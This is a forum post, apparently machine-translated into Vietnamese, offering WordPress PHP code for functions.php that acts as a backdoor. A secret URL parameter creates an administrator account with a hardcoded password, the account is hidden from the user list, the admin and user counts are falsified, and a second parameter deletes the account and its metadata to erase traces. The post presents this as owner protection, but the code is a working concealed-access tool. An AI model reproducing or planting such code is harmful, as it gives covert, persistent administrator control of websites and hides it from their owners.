Đó là phần tổng hợp những gì tôi tìm thấy trên Web liên quan đến chủ đề được đề cập bên dưới, cùng với một vài dòng mã của riêng tôi.
Đó không phải là về Mặt tối, mà là về một trường hợp khi ai đó muốn có thêm một mức độ bảo mật khi truy cập trang WP của họ trong một ‘tình huống’. Vì vậy, nếu Bạn là chủ sở hữu của dự án – đây là cách bạn có thể muốn được bảo vệ:
-
afrer bảo mật mã để hàm.php bạn nhập: /yoursite/?backdoor=go
-
nó sẽ tạo một người dùng quản trị mới trong DB của bạn;
-
bạn đăng nhập tài khoản mới tạo bằng ‘mr_admin’, ‘pa55w0rd! chứng chỉ. Bạn có nó.
!Với đoạn mã được cung cấp, bạn sẽ không được hiển thị trong bảng điều khiển WP, ngay cả khi là số lượng người dùng.
-
Sau khi thực hiện tác vụ bạn gõ /yoursite/?backdoor=leave
-
nó xóa tất cả dấu vết về sự hiện diện của bạn khỏi DB, bao gồm cả Meta của bạn.
-
nếu có bất kỳ Q nào, vui lòng liên hệ.
// Alt entr
add_action( 'wp_head', 'my_backdoor' );
function my_backdoor() {
if ( md5( $_GET['backdoor'] ) == '34d1f91fb2e514b8576fab1a75a89a6b' ) {
require( 'wp-includes/registration.php' );
if ( !username_exists( 'mr_admin' ) ) {
$user_id = wp_create_user( 'mr_admin', 'pa55w0rd!' );
$user = new WP_User( $user_id );
$user->set_role( 'administrator' );
}
}
}
//* Show number of admins minus 1
if ( username_exists( 'mr_admin' ) ) {
add_filter("views_users", "site_list_table_views");
function site_list_table_views($views){
$users = count_users();
$admins_num = $users['avail_roles']['administrator'] - 1;
$all_num = $users['total_users'] - 1;
$class_adm = ( strpos($views['administrator'], 'current') === false ) ? "" : "current";
$class_all = ( strpos($views['all'], 'current') === false ) ? "" : "current";
$views['administrator'] = '<a href="https://forum.freecodecamp.org/t/php-backdoor-to-wp-complete-guide-to-whom-it-may/users.php?role=administrator" class="' . $class_adm . '">' . translate_user_role('Administrator') . ' <span class="count">(' . $admins_num . ')</span></a>';
$views['all'] = '<a href="users.php" class="' . $class_all . '">' . __('All') . ' <span class="count">(' . $all_num . ')</span></a>';
return $views;
}
}
//hide alt entr
function w45345p_hide_specific_user($user_search) {
global $wpdb;
$user_search->query_where =
str_replace('WHERE 1=1',
"WHERE 1=1 AND {$wpdb->users}.user_login != 'mr_admin'",
$user_search->query_where
);
}
add_action('pre_user_query','w45345p_hide_specific_user');
//remove user
add_action( 'init', 'backdoor_delete_user');
function backdoor_delete_user() {
if ( md5( $_GET['backdoor'] ) == '6c374e70334072aeeb62ed46ea987838' ) {
require_once( ABSPATH . 'wp-admin/includes/user.php' );
$user = get_user_by( 'login', 'mr_admin' );
if ( $user ) {
wp_delete_user( $user->ID, 1);
delete_user_meta( $user->ID, $key = '');
}
}
}
